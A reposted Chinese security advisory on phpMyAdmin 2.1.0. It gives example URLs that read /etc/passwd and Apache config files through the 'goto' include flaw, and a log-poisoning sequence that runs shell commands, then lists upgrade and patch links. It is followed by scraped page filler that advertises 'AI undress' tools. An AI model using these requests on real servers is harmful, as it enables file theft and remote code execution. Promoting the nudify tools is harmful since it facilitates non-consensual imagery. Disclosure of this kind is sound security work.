phpMyAdmin2.1.0存在两个漏洞
phpMyAdmin ( http://www.phpwizard.net/projects/phpMyAdmin/ ) 是一款管理 MySQL 数据库的 PHP 工具,具有基于 WEB 的界面。但是发现它存在漏洞。可选择安装新发布稳定版本:
phpMyAdmin 2.2.0。
1、目录遍历漏洞
攻击者通过提供如下的 URL:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/passwd&btnDrop=No (*)
http://www.example.com/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/passwd
能非法访问系统文件
有问题的代码在:
‘include($goto);‘ in sql.php and in tbl_replace.php.
2、执行攻击者代码漏洞
通过使用全局可写日志文件,攻击者能在受影响服务器上执行任意代码。
首先,得到 Apache 配置文件以便知道日志文件存储位置:
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/httpd.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/srm.conf&btnDrop=No
http://www.example.com/phpMyAdmin/sql.php?goto=/etc/apache/conf/access.conf&btnDrop=No
可以看出,日志放在:
/var/log/httpd/error_log
/var/log/httpd/access_log
然后 telnet 到 端口80
# telnet www.example.com 80
Trying xxx.xxx.xxx.xxx...
Connected to www.example.com.
Escape character is ‘^]‘.
GET
^]
telnet> quit
Connection closed.
#
在 GET 请求之后,攻击者能将任意 PHP 代码上传
现在,可以用 Apache 用户身份远程运行命令了:
http://www.example.com/phpMyAdmin/sql.php?goto=/var/log/httpd/
access_log&btnDrop=No?meters=ls%20-l%20/
受影响系统:
phpMyAdmin 2.1.0
解决方案:
建议:
1.使用 phpMyAdmin 2.2.0
http://prdownloads.sourceforge.net/phpmyadmin/phpMyAdmin-2.2.0-php.tar.gz
2.用户下载安装补丁:
http://www.securereality.com.au/patches/phpMyAdmin-SecureReality.diff
摘自:52w.net
熱AI工具
Undresser.AI Undress
人工智慧驅動的應用程序,用於創建逼真的裸體照片
AI Clothes Remover
用於從照片中去除衣服的線上人工智慧工具。
Undress AI Tool
免費脫衣圖片
Clothoff.io
AI脫衣器
Video Face Swap
使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!
熱門文章
熱工具
記事本++7.3.1
好用且免費的程式碼編輯器
SublimeText3漢化版
中文版,非常好用
禪工作室 13.0.1
強大的PHP整合開發環境
Dreamweaver CS6
視覺化網頁開發工具
SublimeText3 Mac版
神級程式碼編輯軟體(SublimeText3)
phpmyadmin怎麼設定主鍵
Apr 07, 2024 pm 02:54 PM
表的主鍵是一列或多列,用於唯一識別表中每筆記錄。設定主鍵的步驟如下:登入 phpMyAdmin。選擇資料庫和表格。勾選要作為主鍵的列。點選 "儲存變更"。主鍵具有資料完整性、查找速度和關係建模方面的好處。
phpmyadmin怎麼加入外鍵
Apr 07, 2024 pm 02:36 PM
在 phpMyAdmin 中新增外鍵可以透過以下步驟實現:選擇包含外鍵的父表。編輯父表結構,在「列」中新增列。啟用外鍵約束,選擇引用表和鍵。設定更新/刪除操作。儲存更改。
phpmyadmin怎麼刪除資料表
Apr 07, 2024 pm 03:00 PM
phpMyAdmin 中刪除資料表的步驟:選擇資料庫和資料表;點選「操作」標籤;選擇「刪除」選項;確認並執行刪除操作。
wordpress的資料庫存在什麼地方
Apr 15, 2024 pm 10:39 PM
WordPress 資料庫位於 MySQL 資料庫中,儲存所有網站數據,可以透過託管提供者的儀表板、FTP 或 phpMyAdmin 存取。資料庫名稱與網站 URL 或使用者名稱相關,存取需要使用資料庫憑證,包括名稱、使用者名稱、密碼和主機名,這些憑證通常儲存在「wp-config.php」檔案中。
phpmyadmin漏洞屬於什麼漏洞
Apr 07, 2024 pm 01:36 PM
phpMyAdmin 容易受到多種漏洞影響,包括:1. SQL 注入漏洞;2. 跨站點腳本(XSS) 漏洞;3. 遠端程式碼執行(RCE) 漏洞;4. 本地檔案包含(LFI) 漏洞;5. 資訊外洩漏洞;6. 權限提升漏洞。
phpmyadmin外鍵怎麼設定
Apr 07, 2024 pm 03:03 PM
如何設定外鍵?建立主表和子表。打開 phpMyAdmin 儀表板。選擇主表。開啟“結構”標籤。新增外鍵列,並選擇子表中的關聯列。選擇外鍵類型(如“CASCADE”)。儲存更改。
navicat連線不上怎麼辦
Apr 23, 2024 am 10:00 AM
出現 Navicat 無法連線問題時,可依序嘗試以下解決方法:檢查連線資訊是否正確,例如資料庫名稱、主機名稱、連接埠號碼、使用者名稱和密碼。確保資料庫已啟動並正在運行。檢查防火牆規則,確認 Navicat 和相關服務沒有被封鎖。嘗試使用 ping 指令測試網路連線。更新 Navicat 用戶端軟體至最新版本。檢查伺服器日誌,尋找與連線失敗相關的錯誤訊息。嘗試使用其他資料庫工具連接,以排除 Navicat 特定的問題。
phpmyadmin怎麼匯出excel
Apr 07, 2024 pm 02:24 PM
透過 phpMyAdmin 匯出資料到 Excel 格式:登入 phpMyAdmin 後,選擇要匯出的資料庫和表格。點選「匯出」選項,在「格式」下拉式選單中選擇「Excel」。自行選擇匯出列、查詢選項和其它匯出選項。點擊「轉儲」按鈕開始匯出,並下載匯出的 Excel 檔案。
